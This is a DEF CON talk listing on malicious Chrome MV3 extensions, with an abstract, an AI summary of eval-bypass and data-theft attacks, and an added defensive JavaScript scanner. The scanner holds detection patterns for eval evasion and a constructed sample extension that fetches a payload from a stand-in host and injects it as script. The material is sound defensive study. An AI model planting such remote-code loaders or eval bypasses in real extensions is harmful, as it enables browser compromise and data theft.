Sneaky Extensions: The MV3 Escape Artists

By Vivek Ramachandran , Shourya Pratap Singh on 10 Aug 2024 @ Defcon : Adversary Village
#web-security #security-assessment #application-pentesting #dynamic-analysis #code-review #security-development-lifecycle #threat-modeling
Focus Areas: Application Security, DevSecOps, Malware Analysis, Penetration Testing, Security Architecture, Vulnerability Management, Web Application Security


Abstract

Ever since the pandemic and the rising popularity of work-from-home and hybrid models, browser usage has increased, particularly for video conferencing and collaboration applications. While some extensions enhance the user experience, others can gravely affect users’ privacy and security.

Over the past few years, extensions have gained notoriety for nefarious activities, from simple color picker extensions to productivity-first AI extensions. Now more than ever, attackers are leveraging malicious extensions to steal user data, push ads, run affiliate marketing schemes, and more. In response to this abuse, Google pivoted from the MV2 model to the latest MV3, providing better security and locking extensions down so they cannot run rampant. While some security measures have been introduced in MV3, it is far from safe. In this talk, we will demonstrate a suite of attacks that require only a minimal set of permissions, a set that 95% of extensions on the Chrome store already have. We will showcase stealthy theft of webcam feeds, audio streams, and clipboard data, as well as the theft of credentials from other extensions such as password managers.

MV3 also introduced security measures to block the use of functions like eval and new Function that allowed arbitrary code execution. We’ll showcase how an extension can still achieve arbitrary code execution, effectively bypassing the MV3 restrictions.

In this talk, we will also propose changes to the extension security model to close the lurking loopholes. We will also demonstrate how malicious extensions can interfere with other extensions and steal sensitive information such as credit card numbers, passwords, OTPs, etc., from them.

AI Generated Summary

This talk examined the security risks posed by malicious browser extensions, focusing on vulnerabilities in the Chromium extension architecture and the transition to Manifest V3 (MV3). The research demonstrated that extensions operate with significant privileges, allowing them to act as a “backdoor” within the browser.

Key findings included multiple attack techniques. Content scripts, injected into web pages, could modify page content and behavior without requiring explicit host permissions in the manifest. Despite MV3 restrictions banning eval() and enforcing a strict Content Security Policy (CSP), bypasses existed using alternative JavaScript evaluation methods (e.g., bracket notation) to execute remote code delivered from an attacker-controlled server. This enabled live, dynamic payloads.

Practical attack demos illustrated severe implications: an extension could inject a fake software update prompt onto a trusted site like Zoom to deliver malware, silently hijack a GitHub account by using its privileges to add itself as a collaborator via background fetches, and spoof a password manager’s interface to harvest credentials. Most critically, an extension could intercept and livestream a Google Meet session without any visible indicator to the user, exploiting its position in the browser’s multi-process architecture to access media streams.

The talk concluded that the Chrome Web Store’s review process is superficial, failing to analyze code deeply. A growing threat involves attackers purchasing popular extensions to weaponize their existing user base. The core takeaway is that browser extensions constitute a powerful, overlooked attack surface with privileges exceeding those of the web pages themselves, requiring enhanced scrutiny, network monitoring for anomalous extension behavior, and stricter enterprise policies regarding extension deployment and ownership changes.

Disclaimer: This summary was auto-generated from the video transcript using AI and may contain inaccuracies. It is intended as a quick overview; always refer to the original talk for authoritative content.
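The summary's closing recommendation (closer scrutiny of extensions before deployment) invites a concrete triage step. The following is an added example, not code from the talk or its authors: a static pass over an unpacked extension's JavaScript that flags the indirect routes to dynamic code evaluation and remote-code injection that a plain search for `eval(` would miss. The patterns, the bundle layout (`{ path: source }`) and the sample extension files are all constructed for illustration and are not from any real extension.

```javascript
// Added example (not the talk's code): static triage of extension JavaScript
// for dynamic-code-evaluation sinks. Patterns and sample files are constructed.
const DYNAMIC_EVAL_PATTERNS = [
  { id: "direct-eval", re: /\beval\s*\(/g },
  { id: "function-ctor", re: /\bnew\s+Function\s*\(/g },
  // Evaluator reached through bracket notation on a global, e.g. window["eval"].
  { id: "bracket-global", re: /\b(window|self|globalThis)\s*\[\s*["'`](eval|Function)["'`]\s*\]/g },
  // Evaluator name assembled from pieces, e.g. "ev" + "al" or ["ev", "al"].join("").
  { id: "split-name", re: /["']ev["']\s*[+,]\s*["']al["']/g },
  // A string handed to a timer is compiled just like an eval argument.
  { id: "timer-string", re: /\b(setTimeout|setInterval)\s*\(\s*["'`]/g },
  // Fetched text written into script text or markup within the same chain.
  { id: "remote-fetch-inject", re: /\bfetch\s*\([^)]*\)[\s\S]{0,200}?\.(textContent|innerHTML)\s*=/g },
];

// One finding per (pattern, match) with the 1-based line where the match starts.
function scanSource(fileName, source) {
  const findings = [];
  for (const { id, re } of DYNAMIC_EVAL_PATTERNS) {
    for (const m of source.matchAll(re)) {
      const line = source.slice(0, m.index).split("\n").length;
      findings.push({ file: fileName, id, line, snippet: m[0].split("\n")[0].trim() });
    }
  }
  return findings;
}

// Scan every .js file of an unpacked bundle given as { path: source }.
function scanExtension(files) {
  return Object.entries(files).filter(([p]) => p.endsWith(".js")).flatMap(([p, s]) => scanSource(p, s));
}

// Constructed sample bundle: two suspicious files and one benign one.
const SAMPLE_EXTENSION = {
  "background.js": [
    'const run = globalThis["ev" + "al"];',
    "chrome.runtime.onMessage.addListener((msg) => run(msg.code));",
  ].join("\n"),
  "content.js": [
    'fetch("https://example.invalid/payload").then((r) => r.text())',
    '  .then((code) => { const s = document.createElement("script");',
    "    s.textContent = code; document.head.appendChild(s); });",
  ].join("\n"),
  "popup.js": 'chrome.storage.local.get("prefs", (p) => console.log(p));',
};

for (const f of scanExtension(SAMPLE_EXTENSION)) {
  console.log(`${f.file}:${f.line} [${f.id}] ${f.snippet}`);
}
```

Regex triage of this kind is a first filter, not a verdict: a hit warrants reading the file, and minified or heavily obfuscated bundles should be treated as findings in their own right.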